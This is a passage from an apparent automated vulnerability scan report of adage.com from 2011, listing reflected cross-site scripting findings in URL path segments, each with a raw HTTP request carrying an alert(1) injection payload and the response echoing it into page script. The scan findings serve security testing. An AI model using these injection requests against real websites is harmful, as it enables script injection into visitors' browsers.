<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus10b9b"-alert(1)-"ea04503a836/digital.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.df
...[SNIP]...

1.101. http://adage.com/images/bottom/menus/digital.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/digital.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1bba"-alert(1)-"239b8dd9444 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/digital.pnge1bba"-alert(1)-"239b8dd9444?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:55 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D076E2129A9E956908F653B920236415C6FB003A; path=/
Set-Cookie: HMAC=E5CFDE4A37905DACA1EDCAFD9CF6DC03887FAC0F; path=/
Set-Cookie: HMAC=EF563139F2002779F9301F48DD260EB3419A8190; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/digital.pnge1bba"-alert(1)-"239b8dd9444"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.102. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1aa85"-alert(1)-"2668855e0e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images1aa85"-alert(1)-"2668855e0e/bottom/menus/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E4AAF4A24105EF9976F5A3CB2CA6478DF7F73ACE; path=/
Set-Cookie: HMAC=9E8F46A11AEA0DD6C1F6A05686F582AD4D4C7AA7; path=/
Set-Cookie: HMAC=E2652891D4C59D22C71EC1E05F652712C8C16514; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49470
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images1aa85"-alert(1)-"2668855e0e/bottom/menus/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.103. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f53d"-alert(1)-"6b94a11373c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom2f53d"-alert(1)-"6b94a11373c/menus/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=F8287ECCFD375686A0167E3DC63983221F10CDF7; path=/
Set-Cookie: HMAC=03E344AC8469B3883FD8BED55DC2AE335A7B29E5; path=/
Set-Cookie: HMAC=A6097E17E01C2A351D5B1F3A481A654CA44C0833; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom2f53d"-alert(1)-"6b94a11373c/menus/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.j
...[SNIP]...

1.104. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e821e"-alert(1)-"79ddf212f2d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menuse821e"-alert(1)-"79ddf212f2d/global_news.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:47 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=46BAE280CB02FD28AB4E1B0403F533F15D831E6D; path=/
Set-Cookie: HMAC=4D08DF71E0E17B8E91B33E6AA65ECD753B3B2F8E; path=/
Set-Cookie: HMAC=9A43240B092D1B6DB3E9C7D3AAF383A67F8AC63E; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menuse821e"-alert(1)-"79ddf212f2d/global_news.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hb
...[SNIP]...

1.105. http://adage.com/images/bottom/menus/global_news.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/global_news.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 858b7"-alert(1)-"bb05cec5b1e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/global_news.png858b7"-alert(1)-"bb05cec5b1e?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=E091CAA4133BFDF794883A7501EEF019343F06FF; path=/
Set-Cookie: HMAC=8E85996781FF324B146FE5FBFD2404711A048B67; path=/
Set-Cookie: HMAC=04E199F5A8AF6D7BF213D8DFEED258A98723422C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49471
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
in.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/global_news.png858b7"-alert(1)-"bb05cec5b1e"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.106. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b52f8"-alert(1)-"3572e8d3978 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /imagesb52f8"-alert(1)-"3572e8d3978/bottom/menus/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=24D2B1E3D90B28A82716DC55500250D24CB6F499; path=/
Set-Cookie: HMAC=8A3CC21C1AD1FB733ACE62FD248C92CC86D72123; path=/
Set-Cookie: HMAC=413AD55B00244C69772F84E582F963DA6FDECFD1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/imagesb52f8"-alert(1)-"3572e8d3978/bottom/menus/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx
...[SNIP]...

1.107. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0678"-alert(1)-"3f00723c72b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottomb0678"-alert(1)-"3f00723c72b/menus/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=2DFF7E94009EB90A67520654120A05D60E466602; path=/
Set-Cookie: HMAC=62095A3B6B3031DA40686DC4464EACA1296466A3; path=/
Set-Cookie: HMAC=41261E852028C84E2AF981022D3A38D82BBF5401; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottomb0678"-alert(1)-"3f00723c72b/menus/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!
...[SNIP]...

1.108. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50e14"-alert(1)-"8f6132336dd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus50e14"-alert(1)-"8f6132336dd/hispanic_marketing.png?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:31 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AC1B6A7607937065F639263F49D9E4D3CCDAA014; path=/
Set-Cookie: HMAC=53908E792419BE4154F7B15751D787CD12D5DA0D; path=/
Set-Cookie: HMAC=F97E96E75990B86301022B079C7FC743E451E41F; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
;hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus50e14"-alert(1)-"8f6132336dd/hispanic_marketing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.
...[SNIP]...

1.109. http://adage.com/images/bottom/menus/hispanic_marketing.png [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/hispanic_marketing.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a321c"-alert(1)-"985e8bfe21e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom/menus/hispanic_marketing.pnga321c"-alert(1)-"985e8bfe21e?1292963511 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:11:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=49BBCF2C2EEE6DB1A9661673D8310C29A3F07F16; path=/
Set-Cookie: HMAC=B966704E0076706227F9E418D6EAE14880ECFFEB; path=/
Set-Cookie: HMAC=671E5066F4B29817F92458DDAB2052827C6065FF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1292963511";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images/bottom/menus/hispanic_marketing.pnga321c"-alert(1)-"985e8bfe21e"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.110. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90478"-alert(1)-"a4ab2d20d6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images90478"-alert(1)-"a4ab2d20d6c/bottom/menus/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=BB58AC18711636FE82F375A58C6F69EA32DA5CFA; path=/
Set-Cookie: HMAC=A74F0A4A1CF561C7FFA63A60361DC2A08477B328; path=/
Set-Cookie: HMAC=494E0E53AE2BFA3D88F95ED5D0263904EA968ECC; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
pc="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1311609254";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/images90478"-alert(1)-"a4ab2d20d6c/bottom/menus/housing.png"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms
...[SNIP]...

1.111. http://adage.com/images/bottom/menus/housing.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /images/bottom/menus/housing.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19038"-alert(1)-"34eeeccf4f1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bottom19038"-alert(1)-"34eeeccf4f1/menus/housing.png?1311609254 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
